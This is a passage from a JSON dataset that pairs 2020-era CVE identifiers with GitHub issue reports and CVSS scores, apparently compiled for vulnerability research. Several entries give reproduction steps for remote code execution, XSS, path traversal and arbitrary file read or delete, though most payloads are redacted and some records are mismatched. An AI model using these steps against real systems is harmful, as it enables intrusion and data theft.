  58218. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/7",
  58219. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/7",
  58220. "Repo_new": "cuppacms/cuppacms",
  58221. "Issue_Created_At": "2019-11-01T17:33:20Z",
  58222. "description": "Authenticated Remote code Execution. Affected software: APITAG Type of vulnerability: Remote code execution Discovered by: Yosri Debaibi Description: The file manager option allows admin users to upload images to the application, the rename function could be altered by the users, An authenticated attacker is able to upload a malicious file within an image extension (jpg,jpeg,png ..) and through a custom request using the rename function provided by the file manager is able to modify the image extension into php as a result executing php codes . Proof of concept: Step1: Login to the cuppa cms. Step2:URL: URLTAG Go to the File manager. FILETAG Step3: Upload our malicious php file with image extension in Upload_files. FILETAG Once it is uploaded the file is renamed with APITAG which it is located in PATHTAG as shown in the figure below FILETAG Step4: We launched our proxy to intercept the request then we will rename our file to FILETAG using rename button in the file manager. FILETAG Step5: We deleted the jpg extension from PATHTAG parameter to change our file name to FILETAG and forward the request to the server. FILETAG Step6: We had successfully uploaded our FILETAG in the server. FILETAG we executed our payload by accessing the url below FILETAG PHP code is executed. FILETAG",
  58223. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  58224. "severity": "HIGH",
  58225. "baseScore": 8.8,
  58226. "impactScore": 5.9,
  58227. "exploitabilityScore": 2.8
  58228. },
  58229. {
  58230. "CVE_ID": "CVE-2020-26148",
  58231. "Issue_Url_old": "https://github.com/mity/md4c/issues/130",
  58232. "Issue_Url_new": "https://github.com/mity/md4c/issues/130",
  58233. "Repo_new": "mity/md4c",
  58234. "Issue_Created_At": "2020-09-29T12:42:58Z",
  58235. "description": "Use of uninitialized value in the APITAG function. Hi, While fuzzing md4c NUMBERTAG with Honggfuzz, I found out that the APITAG function may use uninitialized memory. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
  58236. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  58237. "severity": "HIGH",
  58238. "baseScore": 7.5,
  58239. "impactScore": 3.6,
  58240. "exploitabilityScore": 3.9
  58241. },
  58242. {
  58243. "CVE_ID": "CVE-2020-26157",
  58244. "Issue_Url_old": "https://github.com/leanote/desktop-app/issues/353",
  58245. "Issue_Url_new": "https://github.com/leanote/desktop-app/issues/353",
  58246. "Repo_new": "leanote/desktop-app",
  58247. "Issue_Created_At": "2020-09-29T10:22:57Z",
  58248. "description": "Two XSS and RCE vulnerabilites through note titles in Leanote Desktop. I have tried to privately report these critical vulnerabilities for more than NUMBERTAG months now. My first report was on June NUMBERTAG Despite multiple follow ups, I have received no response at all and the vulnerabilities still remain. Unfortunately, this leaves public disclosure as my only option. I have found two trivial XSS vulnerabilities in the Leanote Desktop app that can easily be escalated into RCE as Node integration is enabled. Both vulnerabilities can be caused through the title of a note but they are separate issues. Below is the description of the vulnerabilities. Steps to reproduce NUMBERTAG Create a note using the browser with a APITAG element in the title, for example use the following title: APITAG NUMBERTAG To trigger the first vulnerability: Open Leanote Desktop and start syncing for new notes. As soon as the note from step NUMBERTAG is synced, the script will be executed. This can also be triggered by logging in on a new device or by forcing a resync NUMBERTAG To trigger the second vulnerability: Select the note from step NUMBERTAG and another note using the Shift or Ctrl key. While displaying the batch feature, the script is executed NUMBERTAG In both cases, the XSS can trivially be escalated to RCE as Node integration is enabled. This title would open the calculator on Windows for example: APITAG Affected version: Tested using the latest version NUMBERTAG from here: URLTAG Cause and suggested fixes: The first XSS vulnerability is likely caused by this code: URLTAG The title ( APITAG ) needs to be passed through the APITAG function that you have already implemented in both cases. The second XSS vulnerability is caused by this code: URLTAG Here, APITAG also needs to be passed through APITAG . The RCE escalation is caused by Node integration being enabled. This has been discouraged for a while now: URLTAG Severity: Both vulnerabilities can be triggered remotely by an attacker by sharing a note with a user. If a user imports a malicious note shared with them, the vulnerabilities are triggered. Both vulnerabilities allow for executing arbitrary code on the user's computer. This includes deleting files, installing malware, exfiltrating sensitive data, etc. As such, they should be classified as severe. Additional notes: Leanote Desktop uses Electron version NUMBERTAG This very is very old has has numerous publicly known vulnerabilities. I strongly suggest you update to a newer version of Electron and implement the best practices described here: URLTAG",
  58249. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
  58250. "severity": "CRITICAL",
  58251. "baseScore": 9.6,
  58252. "impactScore": 6.0,
  58253. "exploitabilityScore": 2.8
  58254. },
  58255. {
  58256. "CVE_ID": "CVE-2020-26160",
  58257. "Issue_Url_old": "https://github.com/dgrijalva/jwt-go/issues/422",
  58258. "Issue_Url_new": "https://github.com/dgrijalva/jwt-go/issues/422",
  58259. "Repo_new": "dgrijalva/jwt-go",
  58260. "Issue_Created_At": "2020-07-30T00:20:45Z",
  58261. "description": "Security Vulnerability: failed type assertion leads to bypassing Audience verification. if APITAG happens to be APITAG , as allowed by the spec, the type assertion fails and the value of aud is APITAG . This can cause audience verification to succeed even if the audiences being passed are incorrect if required is set to false . URLTAG ERRORTAG URLTAG",
  58262. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  58263. "severity": "HIGH",
  58264. "baseScore": 7.5,
  58265. "impactScore": 3.6,
  58266. "exploitabilityScore": 3.9
  58267. },
  58268. {
  58269. "CVE_ID": "CVE-2020-26160",
  58270. "Issue_Url_old": "https://github.com/dgrijalva/jwt-go/issues/462",
  58271. "Issue_Url_new": "https://github.com/dgrijalva/jwt-go/issues/462",
  58272. "Repo_new": "dgrijalva/jwt-go",
  58273. "Issue_Created_At": "2021-04-09T18:34:18Z",
  58274. "description": "Migrating Maintenance. See NUMBERTAG I haven't had time to maintain this project for quite a while. I originally made it just for myself, but it appears to have become quite popular. It seems like the best course of action would be to clone this into its own org and then set this repo up to mirror that one until users can fully migrate over. That's probably also a good opportunity to correctly implement go mod support. Does anybody want to take over as maintainer? It looks like APITAG already exists as a github org. Name ideas?",
  58275. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  58276. "severity": "HIGH",
  58277. "baseScore": 7.5,
  58278. "impactScore": 3.6,
  58279. "exploitabilityScore": 3.9
  58280. },
  58281. {
  58282. "CVE_ID": "CVE-2020-26161",
  58283. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6622",
  58284. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6622",
  58285. "Repo_new": "octopusdeploy/issues",
  58286. "Issue_Created_At": "2020-10-11T22:50:29Z",
  58287. "description": "Self hosted Octopus susceptible to host header injection attacks. APITAG you a customer of Octopus Deploy? Don't raise the issue here. Please contact FILETAG so we can triage your report, making sure it's handled appropriately._ Prerequisites x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . x] I have raised a CVE according to our [CVE process URLTAG x] I have written a descriptive issue title [x] I have linked the original source of this report [x] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) Description The HTTP to HTTPS redirection middleware will accept the given Host header to generate the redirection URL. This can be exploited to hijack requests when Octopus is behind a caching reverse proxy. Affected versions Octopus Server NUMBERTAG to Current Links CVE: [ CVETAG URLTAG Internal Issue: URLTAG PR: URLTAG",
  58288. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  58289. "severity": "MEDIUM",
  58290. "baseScore": 6.1,
  58291. "impactScore": 2.7,
  58292. "exploitabilityScore": 2.8
  58293. },
  58294. {
  58295. "CVE_ID": "CVE-2020-26161",
  58296. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6627",
  58297. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6627",
  58298. "Repo_new": "octopusdeploy/issues",
  58299. "Issue_Created_At": "2020-10-13T21:49:42Z",
  58300. "description": "Self hosted Octopus susceptible to host header injection attacks. APITAG you a customer of Octopus Deploy? Don't raise the issue here. Please contact FILETAG so we can triage your report, making sure it's handled appropriately._ Prerequisites x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . x] I have raised a CVE according to our [CVE process URLTAG x] I have written a descriptive issue title [x] I have linked the original source of this report [x] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) Description The HTTP to HTTPS redirection middleware will accept the given Host header to generate the redirection URL. This can be exploited to hijack requests when Octopus is behind a caching reverse proxy. Affected versions Octopus Server NUMBERTAG to Current Links CVE: [ CVETAG URLTAG Internal Issue: URLTAG PR: URLTAG",
  58301. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  58302. "severity": "MEDIUM",
  58303. "baseScore": 6.1,
  58304. "impactScore": 2.7,
  58305. "exploitabilityScore": 2.8
  58306. },
  58307. {
  58308. "CVE_ID": "CVE-2020-26208",
  58309. "Issue_Url_old": "https://github.com/Matthias-Wandel/jhead/issues/7",
  58310. "Issue_Url_new": "https://github.com/matthias-wandel/jhead/issues/7",
  58311. "Repo_new": "matthias-wandel/jhead",
  58312. "Issue_Created_At": "2020-10-22T09:49:38Z",
  58313. "description": "heap buffer overflow on jhead NUMBERTAG APITAG APITAG poc\uff1a CVETAG ERRORTAG",
  58314. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H",
  58315. "severity": "MEDIUM",
  58316. "baseScore": 6.1,
  58317. "impactScore": 4.2,
  58318. "exploitabilityScore": 1.8
  58319. },
  58320. {
  58321. "CVE_ID": "CVE-2020-26214",
  58322. "Issue_Url_old": "https://github.com/alerta/alerta/issues/1277",
  58323. "Issue_Url_new": "https://github.com/alerta/alerta/issues/1277",
  58324. "Repo_new": "alerta/alerta",
  58325. "Issue_Created_At": "2020-07-27T20:14:49Z",
  58326. "description": "Disallow LDP anonymously bind. URLTAG",
  58327. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  58328. "severity": "CRITICAL",
  58329. "baseScore": 9.8,
  58330. "impactScore": 5.9,
  58331. "exploitabilityScore": 3.9
  58332. },
  58333. {
  58334. "CVE_ID": "CVE-2020-26235",
  58335. "Issue_Url_old": "https://github.com/time-rs/time/issues/293",
  58336. "Issue_Url_new": "https://github.com/time-rs/time/issues/293",
  58337. "Repo_new": "time-rs/time",
  58338. "Issue_Created_At": "2020-11-10T10:22:10Z",
  58339. "description": "The call to APITAG may be unsound. because getenv and setenv are not thread safe, APITAG in time may compete with APITAG in libstd. I described this problem in chrono issue URLTAG , and time is also affected.",
  58340. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
  58341. "severity": "MEDIUM",
  58342. "baseScore": 5.3,
  58343. "impactScore": 3.6,
  58344. "exploitabilityScore": 1.6
  58345. },
  58346. {
  58347. "CVE_ID": "CVE-2020-26238",
  58348. "Issue_Url_old": "https://github.com/jmrozanec/cron-utils/issues/461",
  58349. "Issue_Url_new": "https://github.com/jmrozanec/cron-utils/issues/461",
  58350. "Repo_new": "jmrozanec/cron-utils",
  58351. "Issue_Created_At": "2020-11-21T10:46:17Z",
  58352. "description": "Fix security vulnerability regarding the Hibernate dependency..",
  58353. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  58354. "severity": "HIGH",
  58355. "baseScore": 8.1,
  58356. "impactScore": 5.9,
  58357. "exploitabilityScore": 2.2
  58358. },
  58359. {
  58360. "CVE_ID": "CVE-2020-26243",
  58361. "Issue_Url_old": "https://github.com/nanopb/nanopb/issues/615",
  58362. "Issue_Url_new": "https://github.com/nanopb/nanopb/issues/615",
  58363. "Repo_new": "nanopb/nanopb",
  58364. "Issue_Created_At": "2020-11-24T17:26:04Z",
  58365. "description": "Memory leak when parsing a protobuf message with duplicate fields. Hello, While fuzzing a project that relies on Nanopb to parse (untrusted) user input, I found a memory leak which is triggered by sending some message where fields are duplicated. Steps to reproduce the issue In order to test this memleak on several versions of Nanopb (and several Linux distributions), I have written the following script: ERRORTAG What happens? On a up to date Debian NUMBERTAG machine, this leads to the following output: ERRORTAG With my program, APITAG leaks NUMBERTAG bytes, APITAG leaks NUMBERTAG bytes, etc. What should happen? I believe that parsing untrusted input should not leak allocated memory. You might disagree with this belief, in which case it would be nice to indicate in URLTAG that Nanopb may leak memory when parsing untrusted data which was maliciously crafted.",
  58366. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  58367. "severity": "HIGH",
  58368. "baseScore": 7.5,
  58369. "impactScore": 3.6,
  58370. "exploitabilityScore": 3.9
  58371. },
  58372. {
  58373. "CVE_ID": "CVE-2020-26256",
  58374. "Issue_Url_old": "https://github.com/C2FO/fast-csv/issues/540",
  58375. "Issue_Url_new": "https://github.com/c2fo/fast-csv/issues/540",
  58376. "Repo_new": "c2fo/fast-csv",
  58377. "Issue_Created_At": "2020-11-30T14:21:13Z",
  58378. "description": "Security Issue: Request for contact. Hello, The FILETAG has found a potential vulnerability in your project. Please create a Security Advisory URLTAG and invite me in to further disclose and discuss the vulnerability details and potential fix. Alternatively, please add a Security Policy URLTAG containing a security email address to send the details to. Kind regards, A",
  58379. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  58380. "severity": "MEDIUM",
  58381. "baseScore": 6.5,
  58382. "impactScore": 3.6,
  58383. "exploitabilityScore": 2.8
  58384. },
  58385. {
  58386. "CVE_ID": "CVE-2020-26284",
  58387. "Issue_Url_old": "https://github.com/golang/go/issues/38736",
  58388. "Issue_Url_new": "https://github.com/golang/go/issues/38736",
  58389. "Repo_new": "golang/go",
  58390. "Issue_Created_At": "2020-04-29T00:09:12Z",
  58391. "description": "Unsecure path search in os/exec. APITAG What version of Go are you using ( go version )? APITAG $ go version go version APITAG windows/amd NUMBERTAG APITAG Originally noticed with Go NUMBERTAG though. Does this issue reproduce with the latest release? Yes What operating system and processor architecture are you using ( go env )? APITAG APITAG APITAG go env APITAG Output APITAG APITAG APITAG $ go env set GO NUMBERTAG MODULE= set GOARCH=amd NUMBERTAG set GOBIN= set PATHTAG set PATHTAG set FILETAG set GOFLAGS= set GOHOSTARCH=amd NUMBERTAG set GOHOSTOS=windows set GOINSECURE= set GONOPROXY= set GONOSUMDB= set GOOS=windows set PATHTAG set GOPRIVATE= set GOPROXY= URLTAG set GOROOT=C:\\Go set APITAG set GOTMPDIR= set PATHTAG set GCCGO=gccgo set AR=ar set CC=gcc set CXX=g++ set CGO_ENABLED NUMBERTAG set GOMOD= set CGO_CFLAGS= g O2 set CGO_CPPFLAGS= set CGO_CXXFLAGS= g O2 set CGO_FFLAGS= g O2 set CGO_LDFLAGS= g O2 set PKG_CONFIG=pkg config set GOGCCFLAGS= m NUMBERTAG mthreads fno caret diagnostics Qunused arguments fmessage length NUMBERTAG PATHTAG gno record gcc switches APITAG APITAG What did you do? APITAG Copy PATHTAG to the following program\u2019s directory as \u201c FILETAG \u201d and then run the program: APITAG package main import ( \"fmt\" \"os\" \"os/exec\" ) func APITAG { APITAG APITAG ) cmd := APITAG out, err := APITAG if err != nil { panic(err) } APITAG } APITAG What did you expect to see? The output of PATHTAG What did you see instead? The output of FILETAG (my username, since it is a copy of APITAG If the renamed copy of systeminfo.exe is removed from the test program\u2019s directory, then the output of PATHTAG is displayed as expected. Analysis PATHTAG contains the following: APITAG func APITAG string) (string, error) { \u2026 if APITAG APITAG ) { if f, err := APITAG exts); err == nil { return f, nil } else { return \"\", ERRORTAG err} } } if f, err := APITAG file), exts); err == nil { return f, nil } APITAG If the value of \u2018file\u2019 is an absolute or relative path, a result is returned. The concern is with a value which is only a name, such as APITAG One would expect this to search the list of paths found in the PATH environment variable, but before doing so the code explicitly searches the current working directory (\u201c.\u201d). There does not appear to be any means provided to disable this behavior and search only PATH. I would guess that the intent was to mimic the behavior of the FILETAG command shell, which searches the current directory first even if it is not specified in PATH. By comparison, the documentation for the Windows APITAG API indicates that it does not search PATH at all, but will use the current directory to complete a partial path. APITAG APITAG API offers an alternative, though also flawed, option to search the current directory last.) The problem is that it is not possible to use APITAG and thus APITAG to search the system PATH without searching the current directory. Thus even if diligence is taken to have the program set a secure PATH value, the programmer must be aware of this behavior and avoid using these standard library functions. The documentation of APITAG does not mention the current directory, stating only that it searches \u201cthe directories named by the PATH environment variable.\u201d Suggestions My preferred recommendation would be to remove the explicit search of \u201c.\u201d (the second if clause shown above), in order to provide the best level of security and comply with the documentation. A programmer can add \u201c.\u201d to the PATH environment variable value if the behavior is desired, as one would do in a linux/unix program. If the resulting change in Go behavior/compatibility is not desirable, a workaround could be for APITAG to reference the APITAG environment variable and avoid searching \u201c.\u201d if it is set. This is a workaround which Microsoft apparently added in Vista to disable the behavior in FILETAG . cc MENTIONTAG",
  58392. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
  58393. "severity": "HIGH",
  58394. "baseScore": 8.5,
  58395. "impactScore": 6.0,
  58396. "exploitabilityScore": 1.8
  58397. },
  58398. {
  58399. "CVE_ID": "CVE-2020-26287",
  58400. "Issue_Url_old": "https://github.com/hackmdio/codimd/issues/1630",
  58401. "Issue_Url_new": "https://github.com/hackmdio/codimd/issues/1630",
  58402. "Repo_new": "hackmdio/codimd",
  58403. "Issue_Created_At": "2020-12-20T21:27:54Z",
  58404. "description": "Stored XSS in mermaid. Hi, This weekend I played hxpctf, during competition there was a challenge called hackme. It was a Docker with codimd. My solution was unintended: I use google analytics to exploit a stored xss bug in mermaid. Here is my FILETAG The bug seems to be known by the mermaid developers ( issue URLTAG . I tryed it on FILETAG and it works, too. Hope you can fix soon! P.S. Now I'm going to reopen the issue in mermaid repository Thanks Alessandro Mizzaro",
  58405. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N",
  58406. "severity": "HIGH",
  58407. "baseScore": 8.7,
  58408. "impactScore": 5.8,
  58409. "exploitabilityScore": 2.3
  58410. },
  58411. {
  58412. "CVE_ID": "CVE-2020-26296",
  58413. "Issue_Url_old": "https://github.com/vega/vega/issues/3018",
  58414. "Issue_Url_new": "https://github.com/vega/vega/issues/3018",
  58415. "Repo_new": "vega/vega",
  58416. "Issue_Created_At": "2020-12-21T10:54:25Z",
  58417. "description": "XSS in transform filter. This was found during the hxp ctf. Credit MENTIONTAG and his writeup URLTAG Describe how to reproduce the bug / the goal of the feature request: Paste the below JSON in the Vega Editor URLTAG . Working demo. URLTAG You will see a NUMBERTAG alert dialog. To my understanding you should not be able to run arbitrary JS using vega lite json, should you? Provide an example spec in JSON, wrapped by triple backticks like this: APITAG",
  58418. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N",
  58419. "severity": "HIGH",
  58420. "baseScore": 8.7,
  58421. "impactScore": 5.8,
  58422. "exploitabilityScore": 2.3
  58423. },
  58424. {
  58425. "CVE_ID": "CVE-2020-26299",
  58426. "Issue_Url_old": "https://github.com/autovance/ftp-srv/issues/225",
  58427. "Issue_Url_new": "https://github.com/autovance/ftp-srv/issues/225",
  58428. "Repo_new": "autovance/ftp-srv",
  58429. "Issue_Created_At": "2020-12-15T23:33:06Z",
  58430. "description": "Root escape thru symlink. You can escape root if there is a symlink withing the FTP, so creating a symlink inside the root such as APITAG will allow you to access the server root",
  58431. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N",
  58432. "severity": "CRITICAL",
  58433. "baseScore": 9.6,
  58434. "impactScore": 5.8,
  58435. "exploitabilityScore": 3.1
  58436. },
  58437. {
  58438. "CVE_ID": "CVE-2020-26299",
  58439. "Issue_Url_old": "https://github.com/autovance/ftp-srv/issues/167",
  58440. "Issue_Url_new": "https://github.com/quorumdms/ftp-srv/issues/167",
  58441. "Repo_new": "quorumdms/ftp-srv",
  58442. "Issue_Created_At": "2019-07-17T12:56:53Z",
  58443. "description": "User can escape from root directory. Windows, default File System, root directory set in login event callback. User can browse parent directory using PATHTAG in URL. Example: APITAG URL APITAG becomes a command APITAG At line NUMBERTAG in FILETAG we have APITAG So APITAG returns APITAG",
  58444. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N",
  58445. "severity": "CRITICAL",
  58446. "baseScore": 9.6,
  58447. "impactScore": 5.8,
  58448. "exploitabilityScore": 3.1
  58449. },
  58450. {
  58451. "CVE_ID": "CVE-2020-26566",
  58452. "Issue_Url_old": "https://github.com/Motion-Project/motion/issues/1227",
  58453. "Issue_Url_new": "https://github.com/motion-project/motion/issues/1227",
  58454. "Repo_new": "motion-project/motion",
  58455. "Issue_Created_At": "2020-10-20T11:12:34Z",
  58456. "description": "Could not supply a percent symbol for webcontrol param update. There is no way to put a percent symbol as param value, for example, APITAG : ERRORTAG URLTAG",
  58457. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  58458. "severity": "HIGH",
  58459. "baseScore": 7.5,
  58460. "impactScore": 3.6,
  58461. "exploitabilityScore": 3.9
  58462. },
  58463. {
  58464. "CVE_ID": "CVE-2020-26649",
  58465. "Issue_Url_old": "https://github.com/Drunyacoder/AtomXCMS-2/issues/19",
  58466. "Issue_Url_new": "https://github.com/drunyacoder/atomxcms-2/issues/19",
  58467. "Repo_new": "drunyacoder/atomxcms-2",
  58468. "Issue_Created_At": "2020-09-27T00:32:06Z",
  58469. "description": "APITAG NUMBERTAG FILETAG Arbitarily File Delete Vulnerability. In FILETAG FILETAG There is no detection for input data,so we can delete anything. Payload: FILETAG FILETAG This vulnerability can delete installed detection doucument,hack can reinstall your website.",
  58470. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  58471. "severity": "HIGH",
  58472. "baseScore": 8.1,
  58473. "impactScore": 5.2,
  58474. "exploitabilityScore": 2.8
  58475. },
  58476. {
  58477. "CVE_ID": "CVE-2020-26650",
  58478. "Issue_Url_old": "https://github.com/Drunyacoder/AtomXCMS-2/issues/20",
  58479. "Issue_Url_new": "https://github.com/drunyacoder/atomxcms-2/issues/20",
  58480. "Repo_new": "drunyacoder/atomxcms-2",
  58481. "Issue_Created_At": "2020-09-27T00:42:50Z",
  58482. "description": "FILETAG Arbitarily File Read Vulnerability. In admin/dump.php FILETAG Ther is no detection for input,we can use php://filter with base NUMBERTAG encode to read .php or other files. payload: FILETAG",
  58483. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  58484. "severity": "MEDIUM",
  58485. "baseScore": 5.3,
  58486. "impactScore": 1.4,
  58487. "exploitabilityScore": 3.9
  58488. },
  58489. {
  58490. "CVE_ID": "CVE-2020-26682",
  58491. "Issue_Url_old": "https://github.com/libass/libass/issues/431",
  58492. "Issue_Url_new": "https://github.com/libass/libass/issues/431",
  58493. "Repo_new": "libass/libass",
  58494. "Issue_Created_At": "2020-09-26T13:22:12Z",
  58495. "description": "Bug in APITAG APITAG APITAG , APITAG , const APITAG , int, int, int): Assertion ERRORTAG rad >= eps' failed. Program received signal SIGABRT, Aborted NUMBERTAG ffff6efa NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG (gdb) t APITAG thread is NUMBERTAG APITAG NUMBERTAG ffff7fdb NUMBERTAG LWP NUMBERTAG gdb) bt NUMBERTAG ffff6efa NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG ffff6efc NUMBERTAG a in __GI_abort () at APITAG NUMBERTAG ffff6ef2bd7 in __assert_fail_base (fmt=<optimized out>, APITAG APITAG \"rad >= eps\", file=file APITAG APITAG \"ass_outline.c\", line=line APITAG APITAG APITAG APITAG APITAG , APITAG , const APITAG , int, int, int)\") at APITAG NUMBERTAG ffff6ef2c NUMBERTAG in __GI___assert_fail (assertion NUMBERTAG d NUMBERTAG APITAG \"rad >= eps\", file NUMBERTAG d NUMBERTAG APITAG \"ass_outline.c\", line NUMBERTAG function NUMBERTAG d NUMBERTAG APITAG APITAG APITAG , APITAG , const APITAG , int, int, int)\") at APITAG NUMBERTAG f in outline_stroke () at APITAG NUMBERTAG de NUMBERTAG in ass_outline_construct () at APITAG NUMBERTAG d in ass_cache_get () at ass_cache.c: ERRORTAG NUMBERTAG f2bb8 in get_bitmap_glyph () at APITAG NUMBERTAG ed5db in render_and_combine_glyphs () at APITAG NUMBERTAG e NUMBERTAG e9 in ass_render_event () at APITAG NUMBERTAG e NUMBERTAG d7 in ass_render_frame () at APITAG NUMBERTAG cc NUMBERTAG d in APITAG () at APITAG NUMBERTAG ccf5f in APITAG () at PATHTAG NUMBERTAG main () at PATHTAG",
  58496. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  58497. "severity": "HIGH",
  58498. "baseScore": 8.8,
  58499. "impactScore": 5.9,
  58500. "exploitabilityScore": 2.8
  58501. },
  58502. {
  58503. "CVE_ID": "CVE-2020-26705",
  58504. "Issue_Url_old": "https://github.com/darkfoxprime/python-easy_xml/issues/1",
  58505. "Issue_Url_new": "https://github.com/darkfoxprime/python-easy_xml/issues/1",
  58506. "Repo_new": "darkfoxprime/python-easy_xml",
  58507. "Issue_Created_At": "2020-10-01T14:29:02Z",
  58508. "description": "XML External Entity Injection (XXE). The APITAG functionality is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. URLTAG Steps: We can inject a malicious external entity into the XML(xmldoc in the below line of code). APITAG Please contact me for the POC if required. Thanks.",
  58509. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  58510. "severity": "CRITICAL",
  58511. "baseScore": 9.1,
  58512. "impactScore": 5.2,
  58513. "exploitabilityScore": 3.9
  58514. },
  58515. {
  58516. "CVE_ID": "CVE-2020-26707",
  58517. "Issue_Url_old": "https://github.com/shenzhim/aaptjs/issues/2",
  58518. "Issue_Url_new": "https://github.com/shenzhim/aaptjs/issues/2",
  58519. "Repo_new": "shenzhim/aaptjs",
  58520. "Issue_Created_At": "2020-10-02T12:51:33Z",
  58521. "description": "Remote Code Execution(RCE) via insecure command formatting. It fails to restrict the arbitrary commands in the user input which results in the execution of APITAG APITAG URLTAG Raised the same issue in Hackerone as well with POC.: URLTAG",
  58522. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  58523. "severity": "CRITICAL",
  58524. "baseScore": 9.8,
  58525. "impactScore": 5.9,
  58526. "exploitabilityScore": 3.9
  58527. },
  58528. {
  58529. "CVE_ID": "CVE-2020-26768",
  58530. "Issue_Url_old": "https://github.com/Formstone/Formstone/issues/286",
  58531. "Issue_Url_new": "https://github.com/formstone/formstone/issues/286",
  58532. "Repo_new": "formstone/formstone",
  58533. "Issue_Created_At": "2020-10-02T22:56:01Z",
  58534. "description": "XSS Vulnerability. Hi Formstone team. We are BRZTEC, a offensive information security firm from Brazil. When performed a pentest in one of our customers we found a XSS vulnerability that affect default installation of Formstone. Please, do you can tell us a secure channel to send to yours more details about this vulnerability? Please visit the website CVETAG and see more details on how to request a CVE ID and please acknowledge the finding to our company. If you have any difficulties let us help you. Best Regards. Adriano Monteiro Information Security Specialist EMAILTAG NUMBERTAG FILETAG",
  58535. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  58536. "severity": "MEDIUM",
  58537. "baseScore": 6.1,
  58538. "impactScore": 2.7,
  58539. "exploitabilityScore": 2.8
  58540. },
  58541. {
  58542. "CVE_ID": "CVE-2020-26772",
  58543. "Issue_Url_old": "https://github.com/george518/PPGo_Job/issues/56",
  58544. "Issue_Url_new": "https://github.com/george518/ppgo_job/issues/56",
  58545. "Repo_new": "george518/ppgo_job",
  58546. "Issue_Created_At": "2020-10-06T05:16:08Z",
  58547. "description": "There is a RCE vulnerability when run agent. when agent is running\uff0cwe can send special tcp data flow to agent\uff0cthen it will execute any cmd without any limit // use agent ip and port ERRORTAG",
  58548. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  58549. "severity": "CRITICAL",
  58550. "baseScore": 9.8,
  58551. "impactScore": 5.9,
  58552. "exploitabilityScore": 3.9
  58553. },
  58554. {
  58555. "CVE_ID": "CVE-2020-26800",
  58556. "Issue_Url_old": "https://github.com/ethereum/aleth/issues/5917",
  58557. "Issue_Url_new": "https://github.com/ethereum/aleth/issues/5917",
  58558. "Repo_new": "ethereum/aleth",
  58559. "Issue_Created_At": "2021-01-10T22:07:33Z",
  58560. "description": "Stack based buffer overflow while parsing JSON file. Short description Stack based buffer overflow while parsing JSON file Leads to APITAG Attack scenario An attacker can supply a specially crafted FILETAG file, consisting of NUMBERTAG left square brackets or more, which results in segmentation fault by the application. This immediately results in Denial of Service, and with more advanced exploitation it can have further implications, with higher severity security issues. Components Aleth NUMBERTAG Reproduction Create a .json file consisting of NUMBERTAG left square brackets ([) or more. Run it using the following command; \"./aleth\u00a0 config \" followed by the .json file created earlier. The stack overflow can be examined with gdb (\"set args config . APITAG or with valgrind (\"valgrind ./aleth\u00a0 config . APITAG I submitted this bug in the bug bounty program in Oct NUMBERTAG but that kind of vulnerabilities are out of scope. As there was no intention to publish the vulnerability and issue a fix after NUMBERTAG months I responsibly disclose the vulnerability with the intention to help the security team to fix the issue or mark the application as EOL if that's the case. As I didn't manage to properly compile the app with my fuzzers compiler I could use some insights on where the parser of the config file is. 